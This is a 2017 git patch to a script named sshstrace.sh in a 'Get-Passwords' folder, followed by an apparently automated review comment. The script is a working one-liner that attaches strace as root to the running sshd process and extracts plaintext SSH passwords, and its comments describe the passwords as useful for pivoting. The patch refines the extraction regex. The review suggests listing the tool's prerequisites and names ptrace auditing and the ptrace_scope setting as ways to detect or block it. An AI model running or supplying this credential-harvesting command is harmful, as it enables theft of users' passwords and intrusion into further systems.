From eecffb2ff2b98c05bcf896a91c4bed9f281a95ad Mon Sep 17 00:00:00 2001
From: dade <0xdade@users.noreply.github.com>
Date: Sat, 22 Jul 2017 20:01:25 -0700
Subject: [PATCH] Update sshstrace.sh
---
 Get-Passwords/sshstrace.sh | 5 ++---
 1 file changed, 2 insertions(+), 3 deletions(-)
diff --git a/Get-Passwords/sshstrace.sh b/Get-Passwords/sshstrace.sh
index ef9594f..317a572 100644
--- a/Get-Passwords/sshstrace.sh
+++ b/Get-Passwords/sshstrace.sh
@@ -2,8 +2,7 @@
 #
 # In a facepalm revelation, it has come to my attention that you can use strace as root to collect passwords from sshd
 # Passwords are useful for pivoting and can be significantly faster than cracking /etc/shadow
-# 9 characters gets padded to 10 characters. 13 characters get padded to 14.
-# I've seen padding with 'r' and 't' so far
+# I think I fixed the random char padding problem, but now perl is required
 #
-strace -s 64 -fp `cat /var/run/sshd.pid` 2>&1 | grep --line-buffered -Eo 'write\(4, "\\0\\0\\0\\[0-9]*[^\]{2,}[^\\0]"' | sed -e 's/write(4, "\\0\\0\\0\\[0-9]*\(.*\)"/\1/g'
+strace -s 128 -fp `cat /var/run/sshd.pid` 2>&1 | grep --line-buffered -oP 'write\(4, "\\0\\0\\0\\[\d]*[^\\]{2,}[^\\0]"' | perl -pe 's/write\(4, "\\0\\0\\0\\([\d]+|[\w])(.*)"/\2/g'
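Review bot: The replacement header comment on the new side says only that perl is required, which understates what the new pipeline depends on: the `grep -oP` stage needs a grep built with PCRE support in addition to the `perl -pe` stage, and the `strace -fp` attach needs root, as the existing comment already implies. I would state the prerequisites in one line, e.g. `# Requires root, strace, grep with -P (PCRE support) and perl`. For readers using this script as a detection test case, it would also help to note that the observable is a ptrace attach to the PID read from /var/run/sshd.pid, which audit rules on the `ptrace` syscall can log and `kernel.yama.ptrace_scope=3` prevents. As a style point, the new line keeps the unquoted backtick substitution; `"$(cat /var/run/sshd.pid)"` is the conventional form.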